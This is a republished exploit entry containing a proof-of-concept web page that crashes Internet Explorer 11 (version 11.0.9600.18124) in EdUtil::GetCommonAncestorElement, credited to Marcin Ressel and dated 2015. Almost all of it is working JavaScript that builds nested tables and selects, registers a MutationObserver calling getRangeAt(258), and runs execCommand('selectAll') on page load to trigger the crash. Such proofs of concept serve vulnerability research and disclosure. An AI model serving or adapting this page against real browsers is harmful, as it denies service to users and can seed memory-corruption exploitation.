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Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of S
来源:https://twitter.com/m_ressel 作者:Ressel 发布时间:2016-01-14  
<!doctype html>
        <meta http-equiv='Cache-Control' content='no-cache'/>
        <title>EdUtil::GetCommonAncestorElement Remote Crash</title>
      * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
      * Date : 31.12.2015
      * Author : Marcin Ressel (https://twitter.com/m_ressel)
      * Vendor Hompage : www.microsoft.com
      * Software Link : n/a
      * Version : 11.0.9600.18124
      * Tested on: Windows 7 x64
      var trg,src,arg;
      var range,select,observer;
            function testcase()
              document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';
            var all = document.getElementsByTagName("*");
              trg = all[9];
              src = all[2];
                arg = all[12];
          select = document.getSelection();
              observer = new MutationObserver(new Function("","range = select.getRangeAt(258);"));
              document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>'); 
    <body onload='testcase();'>  
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